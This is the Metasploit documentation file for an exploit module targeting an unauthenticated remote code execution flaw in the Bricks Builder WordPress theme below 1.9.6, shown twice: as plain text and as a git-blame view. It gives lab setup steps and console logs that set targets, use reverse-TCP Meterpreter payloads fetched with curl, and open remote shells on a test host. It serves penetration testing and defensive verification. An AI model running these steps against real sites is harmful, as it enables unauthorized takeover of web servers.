documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md

## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6.
The vulnerability allows attackers to execute arbitrary PHP code by leveraging
a nonce leakage to bypass authentication and exploit the eval() function usage within the theme.

To replicate a vulnerable environment for testing:

1. Install WordPress.
2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
3. Activate Bricks Builder.
4. Create a model with a default page (to ensure the nonce is on index.php, add some elements).

## Verification Steps

1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.

## Options

No option

## Scenarios

### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8

**Setup**:

- Local WordPress instance with Bricks Builder Theme version 1.8.
- Metasploit Framework.

**Steps**:

1. Start `msfconsole`.
2. Load the module:
```
use exploit/multi/http/wp_bricks_builder_rce
```
4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
5. Configure other necessary options (TARGETURI, SSL, etc.).
6. Launch the exploit:
```
exploit
```

**Expected Results**:

- The module attempts to retrieve a nonce from the local server.
- It then uploads and executes the payload.
- If successful, control over the local WordPress instance is gained, depending on the payload used.

**Example**:

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```
msf > search bricks

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce

msf > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/wp_bricks_builder_rce) > options

Module options (exploit/multi/http/wp_bricks_builder_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to WordPress
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ilPaBylkCKr      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
rhosts => localhost
msf exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
rport => 8888
msf exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (3045380 bytes) to 172.20.0.2
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100

meterpreter > sysinfo 
Computer     : 172.20.0.2
OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

With `php/meterpreter/reverse_tcp`:

```
msf exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (39927 bytes) to 172.20.0.2
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100

meterpreter > sysinfo
Computer    : 65e1e703e433
OS          : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > 
```
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`## Vulnerable Application`

			`This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6.`
			`The vulnerability allows attackers to execute arbitrary PHP code by leveraging`
			`a nonce leakage to bypass authentication and exploit the eval() function usage within the theme.`

			`To replicate a vulnerable environment for testing:`

			`1. Install WordPress.`
			`2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.`
			`3. Activate Bricks Builder.`
			`4. Create a model with a default page (to ensure the nonce is on index.php, add some elements).`

			`## Verification Steps`

			`1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).`
			2. Launch `msfconsole` in your Metasploit framework.
			3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
			4. Set `RHOSTS` to the local IP address or hostname of the target.
			5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
			6. Execute the exploit using the `run` or `exploit` command.
			`7. If the target is vulnerable, the module will execute the specified payload.`

			`## Options`

			`No option`

			`## Scenarios`

			`### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8`

			`Setup:`

			`- Local WordPress instance with Bricks Builder Theme version 1.8.`
			`- Metasploit Framework.`

			`Steps:`

			1. Start `msfconsole`.
			`2. Load the module:`
			```
			`use exploit/multi/http/wp_bricks_builder_rce`
			```
			4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
			`5. Configure other necessary options (TARGETURI, SSL, etc.).`
			`6. Launch the exploit:`
			```
			`exploit`
			```

			`Expected Results:`

			`- The module attempts to retrieve a nonce from the local server.`
			`- It then uploads and executes the payload.`
			`- If successful, control over the local WordPress instance is gained, depending on the payload used.`

			`Example:`

			With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > search bricks`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00
			`Matching Modules`
			`================`

			`# Name Disclosure Date Rank Check Description`
			`- ---- --------------- ---- ----- -----------`
			`0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme`


			`Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce`

Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use 0`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > options`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00
			`Module options (exploit/multi/http/wp_bricks_builder_rce):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.`
			`html`
			`RPORT 443 yes The target port (TCP)`
			`SSL true no Negotiate SSL/TLS for outgoing connections`
			`TARGETURI / yes The URI path to WordPress`
			`VHOST no HTTP server virtual host`


			`Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)`
			`FETCH_DELETE false yes Attempt to delete the binary after execution`
			`FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes`
			`FETCH_SRVHOST no Local IP to use for serving payload`
			`FETCH_SRVPORT 8080 yes Local port to use for serving payload`
			`FETCH_URIPATH no Local URI to use for serving payload`
			`FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces`
			`LHOST 192.168.1.5 yes The listen address (an interface may be specified)`
			`LPORT 4444 yes The listen port`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`0 Automatic`



			`View the full module info with the info, or info -d command.`

Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > set ssl false`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`[!] Changing the SSL option's value may require changing RPORT!`
			`ssl => false`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`rhosts => localhost`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > set rport 8888`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`rport => 8888`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > exploit`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00
			`[*] Started reverse TCP handler on 192.168.1.5:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable.`
			`[+] Nonce retrieved: 953563d296`
			`[*] Sending stage (3045380 bytes) to 172.20.0.2`
			`[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100`

			`meterpreter > sysinfo`
			`Computer : 172.20.0.2`
			`OS : Debian 11.8 (Linux 6.4.10-060410-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
			```

			With `php/meterpreter/reverse_tcp`:

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00			`payload => php/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/http/wp_bricks_builder_rce) > exploit`
Add wp_bricks_builder_rce 2024-02-26 22:07:15 +01:00
			`[*] Started reverse TCP handler on 192.168.1.5:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable.`
			`[+] Nonce retrieved: 953563d296`
			`[*] Sending stage (39927 bytes) to 172.20.0.2`
			`[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100`

			`meterpreter > sysinfo`
			`Computer : 65e1e703e433`
			`OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64`
			`Meterpreter : php/linux`
			`meterpreter >`
			```